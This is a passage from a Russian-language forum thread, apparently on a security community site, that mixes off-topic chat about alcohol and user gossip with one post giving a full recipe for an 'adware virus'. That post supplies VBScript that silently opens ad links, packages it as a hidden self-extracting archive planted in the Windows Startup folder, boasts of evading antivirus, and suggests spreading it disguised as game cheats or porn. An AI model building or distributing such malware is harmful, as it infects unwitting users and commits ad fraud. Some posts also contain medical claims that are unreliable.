Проблема "Вы" поделили своих пользователей на "мы" и "не мы" и это понятие накрепко засело в "ваше" сознание

Глюк

Red Team
03.01.2018
1 185
1 879
BIT
176
@Глюк, здрав будь, друже! Давно не было от тебя вестей новостей, видимо был в делах аки пчела. Знавал таких чемпионов по принятию на грудь, один даже ставил рекорды - 2 бутылочки по 0.5л осиливал 4мя стаканами залпом и, медленно оседая, вставал и путь продолжал, но со временем все они перешли на другую частоту, все таки , наверное, пить - здоровью вредить:cry:
да какие вести-новости. суета сует. что то время куда то всё время убегает. даже не замечаешь как день проходит... )
да, пить вообще вредно. все мои ровесники, кто потреблял это зелье, давно на погосте. а кто не смотрел в эту сторону, и ныне здравствуют...

• Нравится
Реакции: Mitistofel

SearcherSlava

Red Team
10.06.2017
943
1 261
BIT
206
да какие вести-новости. суета сует. что то время куда то всё время убегает. даже не замечаешь как день проходит... )
да, пить вообще вредно. все мои ровесники, кто потреблял это зелье, давно на погосте. а кто не смотрел в эту сторону, и ныне здравствуют...

Прошлого не существует, будущее еще не наступило, есть только настоящее, - может быть так будет не так грустно...а вообще никогда не знаешь, что будет завтра, новый день или новая жизнь... Алкоголь есть один из приоритетов глобального управления человечеством, некоторые твои знакомые оказались подвержены этому влиянию, и... а у ныне здравствующих были другие приоритеты, они вовремя нашлись по жизни.

Только проносится день за днем -
Значит не пробил час,
Вещи пока молчат о своем
И не тревожат нас.
Могут проснуться они летним днем
Или среди зимы,
Чтобы напомнить нам обо всем,
Что забыли мы...

• Нравится
Реакции: Глюк и Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Я пил акоголь исключительно в детстве, для того что бы быть "крутым", старшики вон же пьют... Ну и для преодоления своей скованности и страхов. И когда я уже почувствовал бестрашие и свободу, тогда я понял каким я могу быть и стал без алкоголя стремиться к этому состоянию... Да и позже, я уже захотел чего то большего, начал ставить какие то цели и идти к их достижению, и мной почти сразу же было замечано, что наркотики и алкоголь тормозит моё прогрессирование ).

Алкоголь на мой взгляд на много хуже многих наркотив, например та же марихуана, куда полезнее чем алкоголь. Алкоголь как было сказано выше превращает мужчину в женщину, убивая тестестерон и вырабатывая женские эндорфины... Даже 50 грамм алгоколя на 2 недели выводит из строя нормальную работу гипатоламуса... Алкоголь способствует склеиванию электроцитов, что приводит к инсультам, инфарктам, ну и отмеранию маленькой части мозга при каждом его употреблении... Чё далеко ходить, я знаю много людей, которые поумерали от инсультов и инфарктов, которые вызвал именно алкоголь... Смерть это ещё ладно... некоторые люди стали слабоумными, потому что как я уже говорил выше, из за алкоголя умирает мозг при каждом его приёме...
Да и вообще очень смешно смотреть на зомби, которые не могут ходить прямо, еле тащят ноги и не могут внятно говорить, зато при этом очень смелые ).

Но так же и не могу не отметить моё уважение к людям которые умеют совмещать "большие" дела и приём алкоголя...

Night Hunter

Green Team
13.01.2018
284
284
BIT
0
нет решений, позволяющих пользователям напрямую производить расчеты м-ду собой без участия счета кодебай. Использование нашего счета как прокладки, несет определенные финансовые и юридические риски.
Эм...как бы есть такой функционал для XF, НО, нужно немного будет доработать один плагин. Если будет интересно - стучи в ЛС, там расскажу, т.к. узнавал когда-то для себя.

Сергей Попов

Кодебай
30.12.2015
4 718
6 705
BIT
418
Эм...как бы есть такой функционал для XF, НО, нужно немного будет доработать один плагин. Если будет интересно - стучи в ЛС, там расскажу, т.к. узнавал когда-то для себя.
Очень интересно. Считай что написал тебе в лс :)

valerian38

Grey Team
20.07.2016
662
764
BIT
79
Алкоголь на мой взгляд на много хуже многих наркотив, например та же марихуана, куда полезнее чем алкоголь.
Ну ты даёшь!!! Прямо таки - полезней?
Алкоголь способствует склеиванию электроцитов
Безусловно, особенно у людей, у которых эти ЭЛЕКТРОЦИТЫ имеются. На 100% могу утверждать, что таких людей не существует.
А Mitistofel - это от слова Митя?

• Нравится
Реакции: ALF и Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Ну ты даёшь!!! Прямо таки - полезней?
Конечно. В некоторых странах с помощью неё даже лечат разные болезни на официальной основе...
Единственный минус в конопле на мой взгляд - это паранойя...
Безусловно, особенно у людей, у которых эти ЭЛЕКТРОЦИТЫ имеются. На 100% могу утверждать, что таких людей не существует.
Ну эритроциты, я так то не медик, просто вкурсе за эту тему... И мне как то ровно электроциты или эритроциты...
А Mitistofel - это от слова Митя?
Нет, не от этого слова...
А вы случайно не учитель русского языка в начальной школе?

• Нравится
Реакции: valerian38
V

Valkiria

Продолжу, а заодно верну тему в заданное русло.
По поводу рекламы, нашла у себя на HDD какой-то способ.
Вероятно, оставляла себе на заметку, но возможно, руководству пригодится ))

Создаем рекламный вирус и зарабатываем

Плюсы данной схемы:
+вирь не палится антивирусами​
+не палится в диспетчере задач​
+стабильный заработок​
+легко собирается​
+можно отслеживать переходы по рекламе​

Перейдем к делу.
1. Регистрируемся на сайте с рекламой: adsteroid.pro
2. Переходим во вкладку "источник" и кликаем добавить сайт. Вписываем Название(любое), ссылку на любой сайт и выбираем категорию.
3. Далее во вкладке "источник" кликаем на наш добавленный сайт, кликаем добавить поток. Вписываем юбое название (советую нумеровать чтобы не запутаться), выбираем наш недавно добавленный сайт, код тип - DirectLink, кол-во переходов с одного IP ставим макс. (10)
4. Повторяем пункт 3 примерно 5+раз (смотря промежуток времени через который будет открываться наша реклама)
5. Создаем текстовый документ и вставляем туда этот код:
Код:
Option Explicit
Dim objWshShell
WScript.Sleep (300000)
Set objWshShell = WScript.CreateObject("WScript.Shell")
objWshShell.Run "ваша_ссылка№1", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№2", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№3", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№4", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№5", 0, False
Set objWshShell = Nothing
WScript.Quit 0
где 300000 - 300 секунд (т.е. 1000 - 1 секунда) Можно воспользоваться этим калькулятором:Калькулятор Секунды в Миллисекунды | Сколько миллисекунд в секундах
"WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№X", 0, False" повторяем это столько сколько у вас ссылок
6. Копируем и всталяем 10 раз в середину это
"WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№1", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№2", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№3", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№4", 0, False
WScript.Sleep (300000)
objWshShell.Run "ваша_ссылка№5", 0, False"

8. Сохраняем это все в формате vbs
9. Далее Кликаем ПКМ по нашему vbs и выбираем "добавить в архив" (нужен архиватор)
10. Ставите галочку "Создать Sfx-архив"
Жмете "Дополнительно--->параметры SFX"
Путь для распаковки %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
галку Абсолютный путь оставляете
Жмете "Установка" и там где "выполнить после распаковки" пишете имя вашего уже готового файла в формате name.vbs (не советую выполнять его после распаковки т.к. палевно. Лучше со следуеще гопуска ПК. Просто не вписываем его туда)
Жмете "Режимы"
Ставите галку "Скрыть все".
Жмем "текст и графика" и добовляем значок SFX из файла
11. Нажимаем ОК и второй раз. Вирь готов! осталось только распространить
склеивать файлы с нашем вирем желательно вначале (просто добавляете в архив не один vbs а еще то с чем хотите склеить). Также можно воспользоваться джойнером который не палится. Размещаем где-нибудь (RGHost) и теги под видом чита и Либо прона совместно с Solid Explorer.

Последнее редактирование модератором:

valerian38

Grey Team
20.07.2016
662
764
BIT
79
я еще не знаю как на этом борде тебя админы терпят.
Расстрелян в ..17-ом году.
Прикольная конечно там иерархия. И решение суда - прям такое - железобетонное. Обжалованию не подлежит.

• Нравится
Реакции: ALF, n01n02h и Vertigo
Д

Достоевский Ф.М.

Молодец, Bypass !
Неплохую работу проделал. Вывел на чистую воду смутьяна.
Нефиг этому хамелеону воду мутить то там, то здесь своим скандальным характером.

Я не удивлюсь, если завтра в СМИ пройдёт информация о том, что он был третьим персонажен в истории с отравлением Скрипалей.
Расстреляйте его от греха подальше. Спокойней без него ))

Bypass

Green Team
02.02.2018
451
579
BIT
0
Молодец, Bypass !
Неплохую работу проделал. Вывел на чистую воду смутьяна.
Нефиг этому хамелеону воду мутить то там, то здесь своим скандальным характером.

Я не удивлюсь, если завтра в СМИ пройдёт информация о том, что он был третьим персонажен в истории с отравлением Скрипалей.
Расстреляйте его от греха подальше. Спокойней без него ))
Он уже имеет много мультов тут ) смысла нет расстреливать пусть живет. Просто юзеры пусть знают что за персонаж это.
p.s
Палишься ;)

Последнее редактирование:
Д

Достоевский Ф.М.

Просто знайте кто это.
Что значит "Пусть живёт ?".
Такая новость, такое открытие.
Оказывается, Валькирия - вовсе не девушка, оказывается - это какой-то мужик с женскими наклонностями.
Я уже и не хочу продолжать, кем он может оказаться ))
Чепига - 2 ?
Может, ДБСМ ?
Не, однозначно, в баню.

Иначе, зачем это откровение ? Ты зря провёл своё расследование ?

Bypass

Green Team
02.02.2018
451
579
BIT
0
Оказывается, Валькирия - вовсе не девушка, оказывается - это какой-то мужик с женскими наклонностями.
Чепига - 2 ?
Может, ДБСМ ?
Не, однозначно, в баню.

нет не зря далее будет интереснее это только начало, я еще не раскрыл карты ) это для интриги.

N

n01n02h

Чепига - 2 ?
Может, ДБСМ ?
Не, однозначно, в баню.

Она вроде не скрывала что она "Володя". Но это не точно...

Д

Достоевский Ф.М.

Интереснее ?
Ващее не удивлюсь, если он причастен к смерти президента Кеннеди )
И как ты нашёл эту бомбу ?
А он ещё тут якобы свои фотки какой-то красотки выкладывал. Во п_р_и_д_у_р_о_к ))

Она вроде не скрывала что она "Володя". Но это не точно...
Чё-т я не видел её в мужском роде )) Скрывал. Ещё как скрывал .

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!